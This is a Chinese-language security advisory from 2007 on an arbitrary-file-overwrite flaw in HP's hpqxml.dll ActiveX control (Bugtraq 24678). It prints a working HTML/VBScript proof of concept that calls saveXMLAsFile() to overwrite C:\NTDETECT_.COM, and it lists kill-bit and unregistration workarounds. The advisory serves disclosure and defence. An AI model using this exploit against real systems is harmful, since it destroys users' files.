发布日期：2007-06-26
更新日期：2007-06-28

受影响系统：

HP hpqxml.dll 2.0.0.133

描述：

---

BUGTRAQ  ID: 24678

HP数码成像软件包为用户提供数码照片的编辑、打印等全套解决方案。

HP数码成像软件包中所捆绑的hpqxml.dll控件实现上存在漏洞，远程攻击者可能利用此漏洞控制用户机器。

HPQXML.XMLData.1（hpqxml.dll）ActiveX控件中的saveXMLAsFile()方式创建了参数所指定的文件，这可能允许攻击者以当前登录用户的权限覆盖并破坏系统上的任意文件。

<*来源：Brian Mariani （bmariani@shellcode.com.ar）
  
  链接：http://marc.info/?l=bugtraq&m=118297934715936&w=2
        http://secunia.com/advisories/25869/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
<title>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data
Write</title>
</head>
<body>
<h3>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write</h3><br>

<object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3'
id='target' /></object>

<input language=VBScript onclick=HP() type=button value="Proof of
Concept">

<script language = 'vbscript'>

Sub HP()

filename = "C:\NTDETECT_.COM"

target.saveXMLAsFile filename

End Sub

</script>
</body>
</html>

建议：

---

临时解决方法：

* 为clsid：9C0A0321-B328-466C-8ECA-B9A5522466D3设置Kill bit
* 使用regsvr32注销Unregister hpqxml.dll using.

厂商补丁：

HP
--
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://itrc.hp.com

浏览次数：2801
严重程度：0（网友投票）